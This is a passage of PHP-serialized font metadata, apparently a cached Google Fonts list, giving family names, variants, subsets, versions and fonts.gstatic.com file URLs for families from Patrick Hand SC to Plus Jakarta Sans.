SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/patrickhandsc/v13/0nkwC9f7MfsBiWcLtY65AWDK873ViSi6JQc7Vg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1068;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Pattaya\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:4:\"thai\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/pattaya/v12/ea8ZadcqV_zkHY-XNdCn92ZEmVs.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1069;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Patua One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/patuaone/v16/ZXuke1cDvLCKLDcimxBI5PNvNA9LuA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1070;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Pavanam\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:5:\"tamil\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/pavanam/v11/BXRrvF_aiezLh0xPDOtQ9Wf0QcE.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1071;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Paytone One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/paytoneone/v18/0nksC9P7MfYHj2oFtYm2CiTqivr9iBq_.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1072;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Peddana\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/peddana/v20/aFTU7PBhaX89UcKWhh2aBYyMcKw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1073;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Peralta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/peralta/v17/hYkJPu0-RP_9d3kRGxAhrv956B8.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1074;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Permanent Marker\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/permanentmarker/v16/Fh4uPib9Iyv2ucM6pGQMWimMp004HaqIfrT5nlk.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1075;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Petemoss\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/petemoss/v5/A2BZn5tA2xgtGWHZgxkesKb9UouQ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1076;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Petit Formal Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/petitformalscript/v13/B50TF6xQr2TXJBnGOFME6u5OR83oRP5qoHnqP4gZSiE.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1077;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Petrona\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v28\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:87:\"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk6NsARBH452Mvds.ttf\";s:3:\"200\";s:87:\"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk4NsQRBH452Mvds.ttf\";s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk7TsQRBH452Mvds.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk6NsQRBH452Mvds.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk6_sQRBH452Mvds.ttf\";s:3:\"600\";s:87:\"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk5TtgRBH452Mvds.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk5qtgRBH452Mvds.ttf\";s:3:\"800\";s:87:\"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk4NtgRBH452Mvds.ttf\";s:3:\"900\";s:87:\"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk4ktgRBH452Mvds.ttf\";s:9:\"100italic\";s:90:\"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8uwDFYpUN-dsIWs.ttf\";s:9:\"200italic\";s:90:\"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8mwCFYpUN-dsIWs.ttf\";s:9:\"300italic\";s:90:\"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8rICFYpUN-dsIWs.ttf\";s:6:\"italic\";s:90:\"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8uwCFYpUN-dsIWs.ttf\";s:9:\"500italic\";s:90:\"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8t4CFYpUN-dsIWs.ttf\";s:9:\"600italic\";s:90:\"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8jIFFYpUN-dsIWs.ttf\";s:9:\"700italic\";s:90:\"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8gsFFYpUN-dsIWs.ttf\";s:9:\"800italic\";s:90:\"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8mwFFYpUN-dsIWs.ttf\";s:9:\"900italic\";s:90:\"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8kUFFYpUN-dsIWs.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1078;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Philosopher\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:79:\"http://fonts.gstatic.com/s/philosopher/v19/vEFV2_5QCwIS4_Dhez5jcVBpRUwU08qe.ttf\";s:6:\"italic\";s:82:\"http://fonts.gstatic.com/s/philosopher/v19/vEFX2_5QCwIS4_Dhez5jcWBrT0g21tqeR7c.ttf\";s:3:\"700\";s:83:\"http://fonts.gstatic.com/s/philosopher/v19/vEFI2_5QCwIS4_Dhez5jcWjVamgc-NaXXq7H.ttf\";s:9:\"700italic\";s:86:\"http://fonts.gstatic.com/s/philosopher/v19/vEFK2_5QCwIS4_Dhez5jcWBrd_QZ8tK1W77HtMo.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1079;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Piazzolla\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:109:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7LYx3Ly1AHfAAy5.ttf\";s:3:\"200\";s:109:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7JYxnLy1AHfAAy5.ttf\";s:3:\"300\";s:109:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7KGxnLy1AHfAAy5.ttf\";s:7:\"regular\";s:109:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7LYxnLy1AHfAAy5.ttf\";s:3:\"500\";s:109:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7LqxnLy1AHfAAy5.ttf\";s:3:\"600\";s:109:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7IGwXLy1AHfAAy5.ttf\";s:3:\"700\";s:109:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7I_wXLy1AHfAAy5.ttf\";s:3:\"800\";s:109:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7JYwXLy1AHfAAy5.ttf\";s:3:\"900\";s:109:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7JxwXLy1AHfAAy5.ttf\";s:9:\"100italic\";s:112:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhZqw3gX9BRy5m5M.ttf\";s:9:\"200italic\";s:112:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhRqx3gX9BRy5m5M.ttf\";s:9:\"300italic\";s:112:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhcSx3gX9BRy5m5M.ttf\";s:6:\"italic\";s:112:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhZqx3gX9BRy5m5M.ttf\";s:9:\"500italic\";s:112:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhaix3gX9BRy5m5M.ttf\";s:9:\"600italic\";s:112:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhUS23gX9BRy5m5M.ttf\";s:9:\"700italic\";s:112:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhX223gX9BRy5m5M.ttf\";s:9:\"800italic\";s:112:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhRq23gX9BRy5m5M.ttf\";s:9:\"900italic\";s:112:\"http://fonts.gstatic.com/s/piazzolla/v25/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhTO23gX9BRy5m5M.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1080;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Piedra\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/piedra/v21/ke8kOg8aN0Bn7hTunEyHN_M3gA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1081;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Pinyon Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/pinyonscript/v17/6xKpdSJbL9-e9LuoeQiDRQR8aOLQO4bhiDY.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1082;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Pirata One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/pirataone/v22/I_urMpiDvgLdLh0fAtoftiiEr5_BdZ8.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1083;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Plaster\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/plaster/v24/DdTm79QatW80eRh4Ei5JOtLOeLI.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1084;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Play\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";i:5;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/play/v17/6aez4K2oVqwIjtI8Hp8Tx3A.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/play/v17/6ae84K2oVqwItm4TOpc423nTJTM.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1085;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Playball\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/playball/v16/TK3gWksYAxQ7jbsKcj8Dl-tPKo2t.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1086;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Playfair Display\";s:8:\"variants\";a:12:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:6:\"italic\";i:7;s:9:\"500italic\";i:8;s:9:\"600italic\";i:9;s:9:\"700italic\";i:10;s:9:\"800italic\";i:11;s:9:\"900italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v30\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":12:{s:7:\"regular\";s:107:\"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKdFvUDQZNLo_U2r.ttf\";s:3:\"500\";s:107:\"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKd3vUDQZNLo_U2r.ttf\";s:3:\"600\";s:107:\"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKebukDQZNLo_U2r.ttf\";s:3:\"700\";s:107:\"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKeiukDQZNLo_U2r.ttf\";s:3:\"800\";s:107:\"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfFukDQZNLo_U2r.ttf\";s:3:\"900\";s:107:\"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfsukDQZNLo_U2r.ttf\";s:6:\"italic\";s:110:\"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_qiTbtbK-F2rA0s.ttf\";s:9:\"500italic\";s:110:\"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_pqTbtbK-F2rA0s.ttf\";s:9:\"600italic\";s:110:\"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_naUbtbK-F2rA0s.ttf\";s:9:\"700italic\";s:110:\"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_k-UbtbK-F2rA0s.ttf\";s:9:\"800italic\";s:110:\"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_iiUbtbK-F2rA0s.ttf\";s:9:\"900italic\";s:110:\"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_gGUbtbK-F2rA0s.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1087;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Playfair Display SC\";s:8:\"variants\";a:6:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:3:\"900\";i:5;s:9:\"900italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":6:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/playfairdisplaysc/v15/ke85OhoaMkR6-hSn7kbHVoFf7ZfgMPr_pb4GEcM2M4s.ttf\";s:6:\"italic\";s:99:\"http://fonts.gstatic.com/s/playfairdisplaysc/v15/ke87OhoaMkR6-hSn7kbHVoFf7ZfgMPr_lbwMFeEzI4sNKg.ttf\";s:3:\"700\";s:100:\"http://fonts.gstatic.com/s/playfairdisplaysc/v15/ke80OhoaMkR6-hSn7kbHVoFf7ZfgMPr_nQIpNcsdL4IUMyE.ttf\";s:9:\"700italic\";s:103:\"http://fonts.gstatic.com/s/playfairdisplaysc/v15/ke82OhoaMkR6-hSn7kbHVoFf7ZfgMPr_lbw0qc4XK6ARIyH5IA.ttf\";s:3:\"900\";s:100:\"http://fonts.gstatic.com/s/playfairdisplaysc/v15/ke80OhoaMkR6-hSn7kbHVoFf7ZfgMPr_nTorNcsdL4IUMyE.ttf\";s:9:\"900italic\";s:103:\"http://fonts.gstatic.com/s/playfairdisplaysc/v15/ke82OhoaMkR6-hSn7kbHVoFf7ZfgMPr_lbw0kcwXK6ARIyH5IA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1088;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Plus Jakarta Sans\";s:8:\"variants\";a:14:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:9:\"200italic\";i:8;s:9:\"300italic\";i:9;s:6:\"italic\";i:10;s:9:\"500italic\";i:11;s:9:\"600italic\";i:12;s:9:\"700italic\";i:13;s:9:\"800italic\";}s:7:\"subsets\";a:4:{i:0;s:12:\"cyrillic-ext\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"200\";s:108:\"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIbaomQNQcsA88c7O9yZ4KMCoOg4IA6-91aHEjcWuA_KU7NShXUEKi4Rw.ttf\";s:3:\"300\";s:108:\"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIbaomQNQcsA88c7O9yZ4KMCoOg4IA6-91aHEjcWuA_907NShXUEKi4Rw.ttf\";s:7:\"regular\";s:108:\"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIbaomQNQcsA88c7O9yZ4KMCoOg4IA6-91aHEjcWuA_qU7NShXUEKi4Rw.ttf\";s:3:\"500\";s:108:\"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIbaomQNQcsA88c7O9yZ4KMCoOg4IA6-91aHEjcWuA_m07NShXUEKi4Rw.ttf\";s:3:\"600\";s:108:\"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIbaomQNQcsA88c7O9yZ4KMCoOg4IA6-91aHEjcWuA_d0nNShXUEKi4Rw.ttf\";s:3:\"700\";s:108:\"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIbaomQNQcsA88c7O9yZ4KMCoOg4IA6-91aHEjcWuA_TknNShXUEKi4Rw.ttf\";s:3:\"800\";s:108:\"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIbaomQNQcsA88c7O9yZ4KMCoOg4IA6-91aHEjcWuA_KUnNShXUEKi4Rw.ttf\";s:9:\"200italic\";s:110:\"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIZaomQNQcsA88c7O9yZ4KMCoOg4KozySKCdSNG9OcqYQ2lCR_QMq2oR82k.ttf\";s:9:\"300italic\";s:110:\"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIZaomQNQcsA88c7O9yZ4KMCoOg4KozySKCdSNG9OcqYQ17CR_QMq2oR82k.ttf\";s:6:\"italic\";s:110:\"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIZaomQNQcsA88c7O9yZ4KMCoOg4KozySKCdSNG9OcqYQ0lCR_QMq2oR82k.ttf\";s:9:\"500italic\";s:110:\"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIZaomQNQcsA88c7O9yZ4KMCoOg4KozySKCdSNG9OcqYQ0XCR_QMq2oR82k.ttf\";s:9:\"600italic\";s:110:\"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIZaomQNQcsA88c7O9yZ4KMCoOg4KozySKCdSNG9OcqYQ37Dh_QMq2oR82k.ttf\";s:9:\"700italic\";s:110:\"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIZaomQNQcsA88c7O9yZ4KMCoOg4KozySKCdSNG9OcqYQ3CDh_QMq2oR82k.ttf\";s:9:\"800italic\";s:110:\"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIZaomQNQcsA88c7O9yZ4KMCoOg4KozySKCdSNG9OcqYQ2lDh_QMq2oR82k.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1089;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Podkova\";s:8:\"variants\";a:5:{i:0;s:7:\"